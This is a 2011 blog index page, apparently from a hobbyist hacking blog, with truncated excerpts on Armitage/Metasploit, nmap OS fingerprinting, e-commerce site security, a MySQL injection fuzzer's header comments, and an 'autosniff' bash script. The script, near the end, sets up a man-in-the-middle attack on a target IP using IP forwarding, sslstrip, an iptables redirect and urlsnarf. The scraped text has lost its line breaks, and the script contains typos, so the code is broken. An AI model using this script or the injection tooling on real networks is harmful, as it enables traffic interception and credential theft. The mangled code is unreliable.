Saturday, February 26, 2011

fast and easy hacking ARMITAGE

1.1 Cyber Attack Management Armitage organizes Metasploit's capabilities around the hacking process. There are features for discovery, access, post-exploitation, and manuver. This section describes these features at a high-level, the rest of this manual covers these capabilities in detail.For discovery, Armitage exposes several of Metasploit's host management features. You can import hosts and launch scans to populate a database of targets. Armitage also visualizes the database of targets--you'll always know which hosts you're working with and where you have sessions. Armitage assists with remote exploitation--providing features to automatically recommend exploits and even run active checks so you know which exploits will work. If these...

Thursday, February 24, 2011

Software

List of my Security Software:top 10 hacking toolsarmitagenmapnet stumbler for wirelessubuntu litetry this and enjoyed....

Nmap

nmap nmap is the network mapper tool. nmap can be used to scan your IP addresses (or anyone else's IP addresses for that matter) for open ports. It is important to note that nmap, only scans for open TCP/UDP type ports. See the nmap man page nmap runs on Unix and Windows. The windows version uses either the GUI or the command line version. Operation of nmap on both systems is substantially the same. See the nmap fingerprinting documentation. This information comes with nmap. Running nmap for OS enumerationYou can use nmap to detect which operating system is on the other end by using what is called active stack fingerprinting. nmap keeps a database that you can update that helps in enumerating what the OS of a remote host is. See the following phrack magazine article...

Security

Secure your site:necessary security measuresdcreasing salesSecurity WarningsDrawing L...

Source

List Of My Sourceautosniffschemaf...

Video

list of security video:monitore your pchow-to-connect-your-laptoppccomputer-to-tvcredit wizard, hacking cardshack pc speed19 trick hacking goo...

Security Software

Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help us.Prerequisites to install Armitage:Armitage has the following prerequisites: Java 1.6.0+Metasploit 3.5+ A database and the information to connect to itExamples1./msfrpcd -f -U msf -P test -t BasicOnce you have a database, navigate to the folder containing the Armitage files and type:1./armitage.shCustomization options:You may edit these in the Armitage ->...

Drawing the Line

You need to draw the line between being safe and exaggerating. Online frauds happen, but you shouldn’t put your website under lockdown just because someone might make a purchase using a stolen credit card. Security features are necessary and your visitors should see a few logos that attest to the fact that your website is safe to use, but don’t add more measures that necessary. As long as you know when to stop and you don’t make your visitors feel uncomfortable, your sales will increase gradually and no one will drop their order because of your security featur...

Security Warnings

The worst feature that can be implemented in an eCommerce store is the pop up security warning. Most people who are navigating the internet are not very familiar with how online payments work and they are very skeptical when it comes to giving out their credit card information. If a security warning appears on the screen, there are high chances that they will simply get scared and avoid making the purchase altogether. You shouldn’t give your customers the chance to panic: just implement the necessary features and make sure that your website is secure when it comes to online paymen...

Decreasing Sales with Security Features

If people reach the checkout page and they need to jump through hoops before you give them the chance to place their order, they will most likely leave your store and increase your shopping card abandonment rate. A good example is adding a Captcha code next to the registration form. Users don’t like deciphering these codes and you need to find another way to deter spammers. Some of today’s Captcha codes are quite complicated and there is no reason to add them to an online sto...

Necessary Security Measures

Adding security features to an eCommerce website is not only recommended, it is also necessary. You need to make sure that your customers can give out their credit card information and that it won’t fall into the wrong hands. But how do these safety features affect your sales? Are people more likely to make purchases on websites with many security add-ons or on websites that aren’t focused on credit card security? The answer is somewhere in between. Necessary Security MeasuresSSL certificates are viewed as the standard in eCommerce and running a large online business is almost impossible without this security feature. Most people feel comfortable entering their credit card information once they see the SSL logo and there is no doubt that such...

schemafuzz source

#!/usr/bin/python# MySQL Injection Schema, Dataext, and fuzzer# based on work done by d3hydr8 from www.dodi73.wordpress.com - dataext.py# respect where respect is due# Share the c0de!# pangeran90 Team# www.dodi73.wordpress.com# rsauron[at]gmail[dot]com# Greetz to# d3hydr8, P47r1ck, Tarsian, c0mr@d, reverenddigitalx# NOTES:# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy# will not be used. This is a effort to keep the script from getting stuck in a endless loop.# If the fuzzing part starts returning results for every column and table... that...

new autosniff

#|/bin/bashecho -n "Acces wireshark when finis? If yes, [enter] "read -e NOYESecho -n "Do you want to extract pitcures from the pcap via tcptract? If yws, [enter] "read -e XTRACTecho -n "Interfaces ? example wlan0: "read -e IFACEecho -n "Name of "Session"? (Give Name for folder) : "read -e SESSIONecho -n "Gateway IP - empty to default: "read -e ROUTERecho -n "Target IP - Empty to scan all IP Addres: "read -e VICTIMmkdir /root/$SESSION/iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainecho 1 > /proc/sys/net/ipv4/ip_forwardsslstrip -p -k -w /root/$SESSION/$SESSION.log &iptables -t nat -A PREROUTING -p tcp --destionation-port 80 -j REDIRECT --to-port 10000urlsnarf -i $IFACE | grep htpp...

Pages 3123 »
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Sweet Tomatoes Printable Coupons